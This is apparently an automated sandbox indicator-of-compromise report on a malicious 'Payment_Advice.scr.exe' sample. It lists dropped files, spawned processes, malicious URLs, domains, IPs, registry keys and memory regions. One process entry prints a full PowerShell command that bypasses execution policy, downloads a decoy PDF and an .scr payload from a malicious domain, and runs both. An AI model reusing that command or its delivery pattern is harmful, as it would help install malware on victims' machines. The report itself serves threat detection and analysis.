IOC Report
Payment_Advice.scr.exe

loading gif

Files

File Path
Type
Category
Malicious
Payment_Advice.scr.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\Public\Payment_Advice.pdf
PDF document, version 1.4, 1 pages
dropped
malicious
C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs
data
dropped
malicious
C:\Windows\Temp\hadvices.scr
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage user DataBase, version 0x620, checksum 0xb532ac29, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a0668ec5-4e89-4b5a-9eda-c2985324fe74.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240501131714Z-178.bmp
PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6424
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.scr.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hadvices.scr.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSI1a406.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ceh4mzno.4a1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzrk54o5.dkk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-05-01 15-17-11-905.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\1737b78a-138b-4575-9e85-395b8f616b4a.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\c5a735db-1617-4dde-a156-30851dbce141.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\e0ab29aa-2bff-4421-a708-3599d1536500.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\eeecf0b8-3932-4dbd-806b-a98e2ecda46d.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 46 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Payment_Advice.scr.exe
"C:\Users\user\Desktop\Payment_Advice.scr.exe"
malicious
C:\Users\user\Desktop\Payment_Advice.scr.exe
"C:\Users\user\Desktop\Payment_Advice.scr.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
malicious
C:\Windows\Temp\hadvices.scr
"C:\Windows\Temp\hadvices.scr" /S
malicious
C:\Windows\Temp\hadvices.scr
"C:\Windows\Temp\hadvices.scr"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1724,i,3043175899489958109,16137333913944032320,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://advising-receipts.com/hsbc/hadvices.scr
104.21.27.63
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://advising-receipts.com
unknown
malicious
https://advising-receipts.com/hsbc/Payment_Advice.pdf
104.21.27.63
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://advising-receipts.com
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://adviF.0
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
http://checkip.dyndns.org
unknown
https://github.com/Pester/Pester
unknown
http://mail.qoldenfrontier.com
unknown
http://crl.m
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
http://checkip.dyndns.org/
158.101.44.242
https://reallyfreegeoip.orgp
unknown
https://reallyfreegeoip.org/xml/149.18.24.96
104.21.67.152
https://reallyfreegeoip.org/xml/149.18.24.96$
unknown
http://checkip.dyndns.org/q
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://scratchdreams.tk
unknown
http://reallyfreegeoip.org
unknown
https://reallyfreegeoip.org
unknown
https://scratchdreams.tk/_send_.php?TS
172.67.169.18
https://aka.ms/pscore68
unknown
http://checkip.dyndns.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://scratchdreams.tk
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 24 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
mail.qoldenfrontier.com
108.167.142.65
malicious
advising-receipts.com
104.21.27.63
malicious
checkip.dyndns.org
unknown
malicious
reallyfreegeoip.org
104.21.67.152
scratchdreams.tk
172.67.169.18
checkip.dyndns.com
158.101.44.242

IPs

IP
Domain
Country
Malicious
108.167.142.65
mail.qoldenfrontier.com
United States
malicious
104.21.27.63
advising-receipts.com
United States
malicious
23.210.0.138
unknown
United States
104.21.67.152
reallyfreegeoip.org
United States
172.67.169.18
scratchdreams.tk
United States
158.101.44.242
checkip.dyndns.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileSource
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sFileAncestors
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uPageCount
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sAssetId
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
bisSharedFile
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uPageCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
FileDirectory
There are 41 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2D4C000
trusted library allocation
page read and write
malicious
3B26000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
2A71000
trusted library allocation
page read and write
malicious
889EB1A000
stack
page read and write
6649000
trusted library allocation
page read and write
1FA9657D000
heap
page read and write
C697E3A000
stack
page read and write
5500000
heap
page read and write
F30000
heap
page read and write
1164000
trusted library allocation
page read and write
1FA9659A000
heap
page read and write
C37000
heap
page read and write
2858000
trusted library allocation
page read and write
21681604000
trusted library allocation
page read and write
24E14A8E000
heap
page read and write
5075000
trusted library allocation
page read and write
1755000
heap
page read and write
1160000
trusted library allocation
page read and write
24E1A200000
heap
page read and write
3A85000
trusted library allocation
page read and write
C69777E000
stack
page read and write
C0E000
stack
page read and write
5161000
trusted library allocation
page read and write
7FFD34AC0000
trusted library allocation
page read and write
1FA9656C000
heap
page read and write
2C5B000
trusted library allocation
page read and write
24E19FB0000
trusted library allocation
page read and write
112E000
trusted library allocation
page read and write
21681C60000
trusted library allocation
page read and write
514B000
trusted library allocation
page read and write
CF806FE000
unkown
page readonly
24E19FE0000
trusted library allocation
page read and write
2C03000
trusted library allocation
page read and write
C75000
trusted library allocation
page execute and read and write
2C22000
trusted library allocation
page read and write
C698C4F000
stack
page read and write
7FFD34A60000
trusted library allocation
page read and write
2CC8000
trusted library allocation
page read and write
10F0000
heap
page read and write
D40000
trusted library allocation
page read and write
24E14A43000
heap
page read and write
4FC3000
heap
page read and write
24E14A2B000
heap
page read and write
1FA964D0000
heap
page read and write
2986000
trusted library allocation
page read and write
7FFD34A20000
trusted library allocation
page read and write
4FD2000
trusted library section
page read and write
2B79000
trusted library allocation
page read and write
C43000
trusted library allocation
page execute and read and write
1FA96670000
heap
page read and write
216F794B000
heap
page read and write
113D000
trusted library allocation
page read and write
2D63000
trusted library allocation
page read and write
D76000
trusted library allocation
page execute and read and write
CF80AFE000
unkown
page readonly
51D0000
trusted library allocation
page read and write
21681B53000
trusted library allocation
page read and write
1FA965AE000
heap
page read and write
51C0000
trusted library allocation
page read and write
1777000
heap
page read and write
1FA96790000
heap
page read and write
FF0000
heap
page read and write
1FA96551000
heap
page read and write
1430000
heap
page read and write
24E19FB0000
trusted library allocation
page read and write
519A000
trusted library allocation
page read and write
3C1F000
stack
page read and write
2D71000
trusted library allocation
page read and write
7DF40CE10000
trusted library allocation
page execute and read and write
24E15BB0000
trusted library section
page readonly
7FFD34960000
trusted library allocation
page read and write
7FFD34920000
trusted library allocation
page execute and read and write
2BDA000
trusted library allocation
page read and write
2844000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
7FFD34990000
trusted library allocation
page read and write
2B75000
trusted library allocation
page read and write
116D000
trusted library allocation
page execute and read and write
CF808FE000
unkown
page readonly
FE4000
heap
page read and write
24E1A24F000
heap
page read and write
F3E000
heap
page read and write
1FA965D1000
heap
page read and write
D53000
trusted library allocation
page execute and read and write
216F78F7000
heap
page execute and read and write
24E15BC0000
trusted library section
page readonly
1FA965B3000
heap
page read and write
21681B28000
trusted library allocation
page read and write
1180000
heap
page read and write
6680000
trusted library allocation
page execute and read and write
6C50000
heap
page read and write
1580000
heap
page read and write
216F7315000
heap
page read and write
CFFF8FC000
stack
page read and write
2BBD000
trusted library allocation
page read and write
51A0000
trusted library allocation
page read and write
216F56F7000
heap
page read and write
24E1A090000
trusted library allocation
page read and write
CFFF5FE000
unkown
page readonly
7D0000
heap
page read and write
FD6000
heap
page read and write
501A000
trusted library allocation
page read and write
2BF5000
trusted library allocation
page read and write
889F5FE000
stack
page read and write
21681B38000
trusted library allocation
page read and write
6730000
trusted library allocation
page read and write
C5D000
trusted library allocation
page execute and read and write
154E000
stack
page read and write
4CEE000
stack
page read and write
C4D000
trusted library allocation
page execute and read and write
7FFD34810000
trusted library allocation
page read and write
2C31000
trusted library allocation
page read and write
2BCD000
trusted library allocation
page read and write
62ED000
stack
page read and write
1FA96568000
heap
page read and write
92B000
stack
page read and write
192E000
stack
page read and write
24E15BD0000
trusted library section
page readonly
1022000
heap
page read and write
2870000
heap
page read and write
E16000
trusted library allocation
page read and write
24E1A100000
trusted library allocation
page read and write
24E1A30A000
heap
page read and write
5210000
heap
page read and write
7FFD34764000
trusted library allocation
page read and write
24E1B000000
heap
page read and write
7FFD34942000
trusted library allocation
page read and write
2CC2000
trusted library allocation
page read and write
4FCF000
trusted library section
page read and write
24E15BA0000
trusted library section
page readonly
24E15AA0000
trusted library allocation
page read and write
24E19FF4000
trusted library allocation
page read and write
24E15202000
heap
page read and write
53A0000
heap
page read and write
2CE0000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
1FA982A0000
heap
page read and write
24E19FB1000
trusted library allocation
page read and write
632E000
stack
page read and write
6070000
heap
page read and write
24E1A261000
heap
page read and write
21681C7B000
trusted library allocation
page read and write
CF803FE000
unkown
page readonly
2B25000
trusted library allocation
page read and write
21681608000
trusted library allocation
page read and write
216F5840000
trusted library allocation
page read and write
D7A000
trusted library allocation
page execute and read and write
EE2000
heap
page read and write
51C9000
trusted library allocation
page read and write
281E000
stack
page read and write
56DE000
stack
page read and write
52DE000
stack
page read and write
2AE0000
heap
page read and write
CF5000
stack
page read and write
1FA965B5000
heap
page read and write
24E159A1000
trusted library allocation
page read and write
24E149F0000
heap
page read and write
216F7850000
heap
page execute and read and write
636E000
stack
page read and write
1180000
heap
page read and write
5E1F000
stack
page read and write
2B68000
trusted library allocation
page read and write
7FFD3477B000
trusted library allocation
page read and write
1160000
trusted library allocation
page read and write
24E1A254000
heap
page read and write
646F000
stack
page read and write
21681D7F000
trusted library allocation
page read and write
24E15501000
trusted library allocation
page read and write
216F796A000
heap
page read and write
6640000
trusted library allocation
page read and write
7FFD34A30000
trusted library allocation
page read and write
216F70C7000
heap
page read and write
2168008A000
trusted library allocation
page read and write
7E0000
heap
page read and write
2850000
trusted library allocation
page read and write
51F5000
trusted library allocation
page read and write
24E15B80000
trusted library section
page readonly
C50000
trusted library allocation
page read and write
7FFD349A0000
trusted library allocation
page read and write
1FA96551000
heap
page read and write
24E15215000
heap
page read and write
D50000
trusted library allocation
page read and write
FC0000
heap
page read and write
C698ECB000
stack
page read and write
1772000
heap
page read and write
1FA96592000
heap
page read and write
216F55B0000
heap
page read and write
5044000
trusted library allocation
page read and write
24E19F20000
trusted library allocation
page read and write
1002000
heap
page read and write
1FA96557000
heap
page read and write
7FFD34A90000
trusted library allocation
page read and write
24E15200000
heap
page read and write
24E15F20000
trusted library allocation
page read and write
9EE000
stack
page read and write
889EFFE000
stack
page read and write
24E1531A000
heap
page read and write
DE0000
heap
page read and write
1FA96557000
heap
page read and write
51B0000
trusted library allocation
page read and write
111E000
trusted library allocation
page read and write
6706000
trusted library allocation
page read and write
24E1A303000
heap
page read and write
24E19F90000
trusted library allocation
page read and write
76B000
stack
page read and write
1FA96591000
heap
page read and write
62AF000
stack
page read and write
2BB5000
trusted library allocation
page read and write
21681C75000
trusted library allocation
page read and write
216817FA000
trusted library allocation
page read and write
24E1A2E2000
heap
page read and write
5200000
trusted library section
page read and write
56FE000
stack
page read and write
531E000
stack
page read and write
57FF000
stack
page read and write
2B71000
trusted library allocation
page read and write
C6977FE000
stack
page read and write
2169006D000
trusted library allocation
page read and write
E00000
heap
page read and write
112F000
stack
page read and write
2930000
trusted library allocation
page read and write
389E000
stack
page read and write
7FFD349F0000
trusted library allocation
page read and write
4FBF000
stack
page read and write
24E19FD0000
trusted library allocation
page read and write
7D0000
heap
page read and write
5030000
trusted library allocation
page read and write
1FA963D0000
heap
page read and write
1FA96583000
heap
page read and write
6630000
trusted library allocation
page read and write
3B21000
trusted library allocation
page read and write
2CD2000
trusted library allocation
page read and write
21681B2F000
trusted library allocation
page read and write
1150000
trusted library allocation
page read and write
24E14B13000
heap
page read and write
21681B1C000
trusted library allocation
page read and write
1150000
trusted library allocation
page read and write
E28000
heap
page read and write
5020000
trusted library allocation
page read and write
DD0000
trusted library allocation
page execute and read and write
2D15000
trusted library allocation
page read and write
65AE000
stack
page read and write
2B23000
trusted library allocation
page read and write
C697FBE000
stack
page read and write
E55000
heap
page read and write
216F5910000
heap
page read and write
50DE000
stack
page read and write
CF809FA000
stack
page read and write
216F5610000
heap
page read and write
2B1B000
trusted library allocation
page read and write
EC8000
heap
page read and write
C20000
trusted library allocation
page read and write
216F7900000
heap
page read and write
60AB000
heap
page read and write
16F0000
heap
page read and write
24E1A242000
heap
page read and write
5070000
trusted library allocation
page read and write
24E14CD0000
heap
page read and write
2B28000
trusted library allocation
page read and write
E2E000
heap
page read and write
2BAD000
trusted library allocation
page read and write
F74000
heap
page read and write
296E000
stack
page read and write
24E15302000
heap
page read and write
3D9E000
stack
page read and write
5F2E000
stack
page read and write
24E15B90000
trusted library section
page readonly
2B20000
trusted library allocation
page read and write
21680C33000
trusted library allocation
page read and write
C698D4C000
stack
page read and write
53AD000
heap
page read and write
51CE000
trusted library allocation
page read and write
2847000
trusted library allocation
page read and write
CF802FE000
unkown
page readonly
1550000
heap
page read and write
C697DB7000
stack
page read and write
5E2E000
stack
page read and write
1131000
trusted library allocation
page read and write
28FB000
trusted library allocation
page read and write
C698BCF000
stack
page read and write
7FFD349D0000
trusted library allocation
page read and write
216F7890000
heap
page read and write
39DE000
stack
page read and write
C69803E000
stack
page read and write
7FFD34770000
trusted library allocation
page read and write
51D0000
trusted library allocation
page read and write
216F55A0000
heap
page read and write
1FA96568000
heap
page read and write
24E1535A000
heap
page read and write
2A30000
heap
page execute and read and write
889F1FF000
stack
page read and write
7FFD3491A000
trusted library allocation
page read and write
3A99000
trusted library allocation
page read and write
21690001000
trusted library allocation
page read and write
2B52000
trusted library allocation
page read and write
24E1A2E9000
heap
page read and write
CF8037E000
stack
page read and write
2A81000
trusted library allocation
page read and write
216F56AE000
heap
page read and write
21680001000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page execute and read and write
2B3A000
trusted library allocation
page read and write
5010000
trusted library allocation
page read and write
216F791B000
heap
page read and write
216815DB000
trusted library allocation
page read and write
990000
heap
page read and write
2A2E000
stack
page read and write
CDE000
stack
page read and write
5570000
trusted library allocation
page execute and read and write
216F7971000
heap
page read and write
CF8067E000
stack
page read and write
60ED000
heap
page read and write
CF8007E000
stack
page read and write
2B1D000
trusted library allocation
page read and write
24E1A2F7000
heap
page read and write
539E000
stack
page read and write
216F7380000
heap
page execute and read and write
24E14AFF000
heap
page read and write
5166000
trusted library allocation
page read and write
2A60000
heap
page read and write
C72000
trusted library allocation
page read and write
7FFD34AA0000
trusted library allocation
page read and write
24E1A150000
remote allocation
page read and write
216F56B9000
heap
page read and write
DE0000
trusted library allocation
page read and write
C697D3E000
stack
page read and write
569E000
stack
page read and write
2990000
trusted library allocation
page read and write
